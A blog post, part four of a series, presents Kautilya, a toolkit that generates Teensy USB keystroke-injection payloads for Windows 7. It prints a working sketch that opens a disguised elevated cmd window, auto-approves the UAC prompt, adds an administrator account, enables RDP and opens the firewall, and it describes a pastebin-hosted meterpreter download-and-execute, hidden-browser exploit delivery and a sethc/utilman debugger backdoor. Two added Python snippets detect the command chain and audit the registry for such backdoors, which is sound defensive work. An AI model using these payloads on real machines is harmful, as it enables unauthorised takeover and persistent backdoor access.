Teensy USB HID for Penetration Testers - Part 4 - Kautilya

    In the third part of this series, we discussed how to write sketches using Arduino and Teensyduino. In this part, let's have a look at Kautilya. Kautilya is a toolkit written by me which eases the use of Teensy in a penetration test. It is named after the famous Indian strategist, economist and political scientist Chanakya (Kautilya is one of his aliases). I will touch on some of the less complex payloads of Kautilya in this post.

    Kautilya has a menu-driven UI which can be used to generate sketches without needing to know how to program a Teensy device. The toolkit is written in Ruby and is free and open source. It currently contains payloads for Windows 7 and Linux (tested on Ubuntu 11). Kautilya is specifically designed to support Teensy out of the box; there is absolutely no modification required to the hardware. My motive behind writing Kautilya is to bring Teensy to the masses. During my talks about Kautilya and Teensy I observed that pen testers often do not have enough time to program a device for their usage. Payloads in Kautilya can be used for pre-exploitation and post-exploitation tasks other than the "usual" popping of shells.

    The process of writing payloads for a Windows 7 machine can be summed up as:

    1. Understand the operating system in terms of the USB buffer.
    2. Understand the commands supported and learn to write PowerShell and/or VBS.
    3. Recognize the built-in security measures (like UAC and the PowerShell script execution policy) which may check privileged commands, and then learn how to bypass them.
    4. Understand the time taken by the operating system to complete various commands.
    5. Write the commands and scripts on the Teensy.
    6. Understand more quirks of the command line when the Teensy types things out on the victim.
    7. Try not to be too noisy on the victim.
    8. Test the payload and arrive at a final, reasonable sketch.
    9. Compile the sketch to the Teensy device.
    10. Attach it to the victim machine actively or using social engineering.
    11. Enjoy the pwnage!


    (The next few lines may look like self-promotion.)

    Kautilya automates steps 1-8 for you. Using Kautilya you just need to:

    1. Select a payload and select your options. A sketch (a .ino or .pde file) will be generated for you.
    2. Compile the sketch to the Teensy device.
    3. Attach it to the victim machine actively or using social engineering.
    4. Enjoy the pwnage!





    Kautilya is tested on Ruby 1.9.2. It requires the Ruby gems "colored" and "highline".

    Let's have a look at some of the payloads for Windows in Kautilya. All the payloads are tested on a default install of Windows 7.

    Add a user and Enable RDP
    This payload adds an admin user to the victim. It also enables and starts the Terminal Service on the victim. An exception to the Windows firewall is also added. This payload requires a user to be logged in with admin privileges.



    The generated payload just needs to be compiled to a Teensy++. The device can then be connected to the victim. The victim will see the Start menu open up, some cmd being typed, and then a very small cmd window, which types dark blue on black, will do evil stuff for us...muhahaha


    Let's have a look at the source code for a better understanding. Many payloads in Kautilya are similar in structure to this one.

    Code:
    // Add an admin user and enable RDP payload of Kautilya
    // INPUT0 would be the username and INPUT1 would be the password.
    #define PAYLOAD_USER_ADD "net user INPUT0 INPUT1 /add"
    #define PAYLOAD_GROUP_ADD "net localgroup Administrators INPUT0 /add"

    void setup(){
      delay(5000);
      cmd_admin();      // call to cmd_admin function: open a tiny elevated cmd window
      delay(5000);
      send_alt_y();     // call to send_alt_y function: answer the UAC prompt
      delay(5000);

      add_user();       // call to add_user function

      // Enable terminal service
      Keyboard.println("reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f");
      delay(2000);
      Keyboard.println("reg add \"HKLM\\System\\CurrentControlSet\\Services\\TermService\" /v Start /t REG_DWORD /d 2 /f");
      delay(2000);
      // Start terminal service
      Keyboard.println("sc start termservice");
      delay(2000);
      // Add exception to Windows Firewall
      Keyboard.println("netsh firewall set service type = remotedesktop mode = enable");
      delay(3000);
      Keyboard.println("exit");
    }

    void loop(){
    }

    // Helper: open the Run dialog (Win+R), type a command and press Enter.
    // Not called by setup() in this payload, but shared by other Kautilya payloads.
    void run(char *SomeCommand){
      Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
      Keyboard.set_key1(KEY_R);
      Keyboard.send_now();

      delay(1500);
      Keyboard.set_modifier(0);
      Keyboard.set_key1(0);
      Keyboard.send_now();

      Keyboard.print(SomeCommand);
      Keyboard.set_key1(KEY_ENTER);
      Keyboard.send_now();

      Keyboard.set_key1(0);
      Keyboard.send_now();
    }

    // Type the two net commands into the already open cmd window
    void add_user(){
      delay(2000);
      Keyboard.println(PAYLOAD_USER_ADD);
      delay(2000);
      Keyboard.println(PAYLOAD_GROUP_ADD);
      delay(1000);
    }

    // This function sends an Alt + Y to the UAC prompt,
    // thus effectively saying yes to the prompt
    void send_alt_y(){
      delay(1000);
      Keyboard.set_modifier(MODIFIERKEY_ALT);
      Keyboard.set_key1(KEY_Y);
      Keyboard.send_now();
      delay(100);

      Keyboard.set_modifier(0);
      Keyboard.set_key1(0);
      Keyboard.send_now();
    }

    // Open the Start menu, type the cmd command line into the search box
    // and launch it elevated with Ctrl + Shift + Enter
    void cmd_admin(){
      Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
      Keyboard.send_now();
      delay(1000);
      Keyboard.set_modifier(0);
      Keyboard.send_now();
      delay(2000);
      Keyboard.print("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\" ");
      // this opens up a small cmd window which writes dark blue on black and has the title Installing Drivers
      delay(2000);
      Keyboard.set_modifier(MODIFIERKEY_CTRL);
      Keyboard.send_now();
      Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);
      Keyboard.send_now();
      Keyboard.set_key1(KEY_ENTER);
      Keyboard.send_now();

      delay(200);
      Keyboard.set_modifier(0);
      Keyboard.set_key1(0);
      Keyboard.send_now();
    }

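The sketch above types a fixed chain of commands (net user /add, net localgroup Administrators /add, the two reg add calls, sc start termservice, netsh firewall) into a cmd window opened with "mode con:COLS=15 LINES=1" and the title "Installing Drivers", with only one to five seconds between them. From the defender's side that chain is easy to spot in process-creation telemetry that records command lines (Sysmon event 1 or 4688 with command-line auditing). The following is an added detection example, not part of Kautilya; the tab-separated log format, the parent pids and the log lines are constructed for the demonstration.

```python
import re
from datetime import datetime

# Command lines the sketch types, as (label, pattern over the process command line).
INDICATORS = [
    ("tiny-cmd", re.compile(r"cmd(\.exe)?\s+/T:\S+\s+/K\b.*mode con:COLS=\d+ LINES=\d+", re.I)),
    ("user-add", re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("admin-add", re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("rdp-on", re.compile(r"\breg(\.exe)?\s+add\b.*Terminal Server.*fDenyTSConnections\b.*/d\s+0\b", re.I)),
    ("termservice", re.compile(r"\bsc(\.exe)?\s+start\s+termservice\b", re.I)),
    ("fw-rdp", re.compile(r"\bnetsh(\.exe)?\s+firewall\s+set\s+service\s+type\s*=\s*remotedesktop\s+mode\s*=\s*enable\b", re.I)),
]

def parse_line(line):
    """Parse 'ISO-time<TAB>parent-pid<TAB>command line' (constructed format)."""
    ts, ppid, cmdline = line.rstrip("\n").split("\t", 2)
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"), int(ppid), cmdline

def label(cmdline):
    """Return the indicator labels that match one command line."""
    return [name for name, rx in INDICATORS if rx.search(cmdline)]

def find_keystroke_chains(lines, min_hits=3, window_s=60):
    """Group hits by parent pid and alert when at least min_hits distinct
    indicators appear under one parent within window_s seconds: the sketch
    pauses 1-5 s between commands, so the whole chain lands inside a minute."""
    by_parent = {}
    for line in lines:
        ts, ppid, cmdline = parse_line(line)
        for name in label(cmdline):
            by_parent.setdefault(ppid, {}).setdefault(name, ts)  # first sighting
    alerts = []
    for ppid, hits in by_parent.items():
        span = (max(hits.values()) - min(hits.values())).total_seconds()
        if len(hits) >= min_hits and span <= window_s:
            alerts.append((ppid, sorted(hits)))
    return alerts

# Constructed sample: the tiny cmd window is a child of explorer (pid 800) and
# the typed commands are children of that cmd (pid 1200); pid 2400 is an admin's lone command.
SAMPLE_LOG = [
    "2012-01-10T10:00:05\t800\tcmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\"",
    "2012-01-10T10:00:17\t1200\tnet user backup Passw0rd! /add",
    "2012-01-10T10:00:19\t1200\tnet localgroup Administrators backup /add",
    "2012-01-10T10:00:22\t1200\treg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f",
    "2012-01-10T10:00:26\t1200\tsc start termservice",
    "2012-01-10T10:00:28\t1200\tnetsh firewall set service type = remotedesktop mode = enable",
    "2012-01-10T11:30:00\t2400\tsc start termservice",
]
```

A single sc start termservice from an administrator does not fire; the alert needs several of the chain's steps under one parent in quick succession, which is the tell of a device typing a script rather than a person.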
    Download and Execute
    This payload downloads an executable stored in text format from pastebin (or any other service which allows hosting of text without formatting), converts it back to an exe on the victim and executes it in the background. The exe must be converted into hex format using the script exetotext.ps1 in the extras folder of Kautilya. This script is originally an idea of Matt of the Exploit-Monday blog.



    In the above example, a Windows reverse meterpreter is pasted to pastebin and the URL is provided in the option. This payload can be used even with a low-privilege user.

    Forceful Browsing

    This payload opens up a hidden instance of Internet Explorer using the Internet Explorer COM object and browses to the provided URL. An ideal use case would be hosting an msf exploit or a BeEF hook on the given URL. This payload is one of my favorites, as it executes with normal user (non-administrative) privileges and is very silent.

    Sethc and Utilman Backdoor

    This payload utilizes a useful hack in the Windows OS family. On a locked system, if you press the Shift key five times (or Left Ctrl + Left Shift + Print Screen), i.e. Sticky Keys, sethc.exe is executed with SYSTEM level privileges. In a similar way, if Windows key + U is pressed, Utility Manager (utilman.exe) is launched with SYSTEM privileges. This payload attaches an executable present on the machine as a debugger to sethc.exe and utilman.exe. The attached executables can then be executed with SYSTEM level privileges on a locked Windows machine.
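Attaching a "debugger" to sethc.exe or utilman.exe leaves a Debugger value under the Image File Execution Options (IFEO) key for that binary, which a defender can audit in a registry export. The following is an added audit example, not part of Kautilya: it walks a decoded reg export dump, collects every IFEO Debugger value and reports the ones on accessibility binaries. The .reg text, the planted path and the notepad.exe entry (a legitimate developer-style debugger, kept to show that not every IFEO Debugger is a backdoor) are constructed.

```python
import re

# Accessibility binaries the lock screen launches as SYSTEM; a Debugger value
# under their IFEO key makes Windows run that path instead of the binary.
ACCESSIBILITY_EXES = {"sethc.exe", "utilman.exe"}
IFEO_MARKER = "\\Image File Execution Options\\"

KEY_RX = re.compile(r"^\[(.+)\]\s*$")
DEBUGGER_RX = re.compile(r'^"Debugger"="(.*)"\s*$', re.I)

def parse_ifeo_debuggers(reg_text):
    """Walk 'reg export' style text (already decoded to str) and return
    {exe_name: debugger_path} for every IFEO subkey carrying a Debugger value."""
    found, current_exe = {}, None
    for line in reg_text.splitlines():
        key = KEY_RX.match(line)
        if key:
            path = key.group(1)
            idx = path.lower().find(IFEO_MARKER.lower())
            # subkey name directly under IFEO is the image name; other keys reset the context
            current_exe = path[idx + len(IFEO_MARKER):].split("\\")[0].lower() if idx >= 0 else None
            continue
        dbg = DEBUGGER_RX.match(line)
        if dbg and current_exe:
            found[current_exe] = dbg.group(1).replace("\\\\", "\\")  # .reg doubles backslashes
    return found

def accessibility_backdoors(reg_text):
    """Subset of IFEO Debugger entries whose target is an accessibility binary."""
    return {exe: dbg for exe, dbg in parse_ifeo_debuggers(reg_text).items()
            if exe in ACCESSIBILITY_EXES}

# Constructed sample export; C:\Temp\planted.exe is a placeholder, not a real artifact.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\Temp\\planted.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe]
"Debugger"="C:\\Temp\\planted.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Tools\\vsjitdebugger.exe"
'''
```

Note that reg export writes UTF-16 with a BOM, so decode the file before handing it to parse_ifeo_debuggers.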



    We had a look at some of the less complex payloads of Kautilya. In the next post (or posts) I will explain some more complex and powerful payloads. At least one post will cover breaking Linux (Ubuntu 11) too.

    I am thinking of creating some small videos demonstrating a few payloads, but only if some people ask for it. Please let me know if the length of the blog posts is ok. Feedback and comments are welcome.
    Part I - http://www.garage4hackers.com/conten...o-install.html
    Part II - http://www.garage4hackers.com/conten...llo-world.html
    Part III - http://www.garage4hackers.com/conten...s-arduino.html
    This article was originally published in the blog: Teensy USB HID for Penetration Testers - Part 4 - Kautilya, started by SamratAshok
    1 Comment
    1. H@CK3R_ADI -
      Kudos to you for such nice articles... it will be helpful for me, mate.